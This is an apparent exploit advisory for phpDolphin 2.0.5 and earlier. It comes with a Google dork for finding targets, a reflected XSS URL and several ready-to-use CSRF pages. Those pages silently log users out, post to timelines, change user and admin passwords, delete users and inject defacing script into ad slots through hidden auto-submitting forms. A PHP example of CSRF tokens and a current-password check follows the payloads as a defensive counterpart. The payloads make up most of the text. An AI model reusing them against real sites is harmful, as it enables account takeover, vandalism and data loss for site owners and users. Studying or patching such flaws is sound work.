# Exploit Title: phpDolphin <= 2.0.5 CSRF
# Google Dork: intext:"Powered by phpDolphin"
# Date: January, 15th 2016
# Exploit Author: WhiteCollarGroup
# Vendor Homepage: http://phpdolphin.com
# Version: 2.0.5

XSS (Reflected)
===============

> http://target.com/index.php?a=search&q=teste&filter=m"><h1>XSS</h1><noscript>

CSRF
====

We've found no protection against CSRF (Cross-Site Request Forgery), which makes it possible to perform any kind of action on a user (or admin) account. NO forms are secured at all, but we've included some interesting examples.

These examples execute actions on the user's account while they are visiting a specially prepared page hosted on any other server. The user won't notice anything while visiting, as nothing is shown.

Let's start with the basics:

Logging a user off
------------------

<img src="http://localhost/dolphin/Script/index.php?a=feed&logout=1" width="1" height="1" />

It's good to remember that if the user ticked "remember me", there are cookies called "username" and "password" (the latter MD5-hashed).

Posting on the user's timeline
------------------------------

By changing the "group" input, it's also possible to post in groups.

Lorem ipsum dolor sit amet :)<br/>
Take a look at your profile ;)
<form method="post" action="http://localhost/dolphin/Script/requests/post_message.php" target="hiddenframe" id="hackfrm">
<input type="hidden" name="message" value="HAXORED" />
<input type="hidden" name="privacy" value="1" />
<input type="hidden" name="group" value="" />
<input type="hidden" name="value" value="" />
</form>
<iframe width="0" height="0" id="hiddenframe" name="hiddenframe" border="0" style="display: none"></iframe>
<script>
document.getElementById('hackfrm').submit();
</script>

Things can get a bit funnier.

Changing the user's password
----------------------------

It's interesting that the change-password form does NOT require the current password. Just make sure the "password" and "repeat_password" inputs have EXACTLY the same value.

<form method="post" action="http://localhost/dolphin/Script/index.php?a=settings&b=security" target="hiddenframe" id="hackfrm">
<input type="hidden" name="password" value="hacked1" />
<input type="hidden" name="repeat_password" value="hacked1" />
</form>
<iframe width="0" height="0" id="hiddenframe" name="hiddenframe" border="0" style="display: none"></iframe>
<script>
document.getElementById('hackfrm').submit();
</script>

Funny enough? No? So let's change the administrator's password too. Of course, this page must be visited by the administrator.

<form method="post" action="http://localhost/dolphin/Script/index.php?a=admin&b=security" target="hiddenframe" id="hackfrm">
<input type="hidden" name="password" value="hacked1" />
<input type="hidden" name="repeat_password" value="hacked1" />
</form>
<iframe width="0" height="0" id="hiddenframe" name="hiddenframe" border="0" style="display: none"></iframe>
<script>
document.getElementById('hackfrm').submit();
</script>

To open the admin panel, just visit /index.php?a=admin.

Want to delete a user? Just find out the (numeric) user ID. To do that, open the user's profile, view the source (Ctrl + U) and search (Ctrl + F) for "userid". You will find two "data-userid" attributes; their value is the numeric user ID.

<img src="http://localhost/dolphin/Script/index.php?a=admin&b=users&delete=USER_ID_HERE" width="0" height="0" />

Just want to mess everything up?

Hacking the site index
======================

By adding JavaScript code to one or more of the advertising units, we can block anyone's access to the site. This is our payload:

<script>
document.body.innerHTML = '<h1>HACKED</h1>';
</script><noscript>

And this is our code:

<form method="post" action="http://localhost/dolphin/Script/index.php?a=admin&b=manage_ads&m=i" target="hiddenframe" id="hackfrm">
<input type="hidden" name="ad1" value="<script> document.body.innerHTML = '<h1>HACKED</h1>'; </script><noscript>" />
<input type="hidden" name="ad2" value="<script> document.body.innerHTML = '<h1>HACKED</h1>'; </script><noscript>" />
<input type="hidden" name="ad3" value="<script> document.body.innerHTML = '<h1>HACKED</h1>'; </script><noscript>" />
<input type="hidden" name="ad4" value="<script> document.body.innerHTML = '<h1>HACKED</h1>'; </script><noscript>" />
<input type="hidden" name="ad5" value="<script> document.body.innerHTML = '<h1>HACKED</h1>'; </script><noscript>" />
<input type="hidden" name="ad6" value="<script> document.body.innerHTML = '<h1>HACKED</h1>'; </script><noscript>" />
</form>
<iframe width="0" height="0" id="hiddenframe" name="hiddenframe" border="0" style="display: none"></iframe>
<script>
document.getElementById('hackfrm').submit();
</script>

Enough? Simply put, all forms are vulnerable to CSRF. These were just some.
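As an added defensive counterpart (this is not part of the advisory and not phpDolphin's code), the PHP below shows the two checks whose absence the advisory exploits: a per-session synchronizer token that every state-changing form (post_message, settings, admin security, manage_ads) must echo back, and a current-password requirement on the change-password handler. The session layout, the handler's placement and the helpers verify_current_password() and update_password() are assumptions.

```php
<?php
// Added defensive example; not phpDolphin's code. The session layout and the
// helpers verify_current_password()/update_password() are hypothetical.
declare(strict_types=1);
// SameSite=Lax keeps the session cookie off cross-site POSTs like the forms above.
session_set_cookie_params(['samesite' => 'Lax', 'httponly' => true, 'secure' => true]);
session_start();
// One random token per session, stored server-side.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Hidden input to embed in every state-changing form (settings, post_message, manage_ads, ...).
function csrf_field(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

// Reject the request unless the submitted token matches, using a constant-time compare.
function csrf_verify(array $post): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    $given    = $post['csrf_token'] ?? '';
    return $expected !== '' && is_string($given) && hash_equals($expected, $given);
}

// Hardened change-password handler: a cross-site page can supply neither the token
// nor the victim's current password, so either check alone stops the attack.
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!csrf_verify($_POST)) {
        http_response_code(403);
        exit('Invalid CSRF token');
    }
    if (!verify_current_password($_SESSION['user_id'], (string)($_POST['current_password'] ?? ''))) {
        http_response_code(403);
        exit('Current password is incorrect');
    }
    $new = (string)($_POST['password'] ?? '');
    if ($new === '' || $new !== ($_POST['repeat_password'] ?? '')) {
        http_response_code(400);
        exit('Passwords do not match');
    }
    update_password($_SESSION['user_id'], password_hash($new, PASSWORD_DEFAULT));
}
```

The token check alone also covers the logout, post, user-delete and ad-management requests above once those handlers call csrf_verify() and their forms render csrf_field(); the GET-triggered logout and delete actions additionally need to become POSTs so an <img> tag cannot fire them.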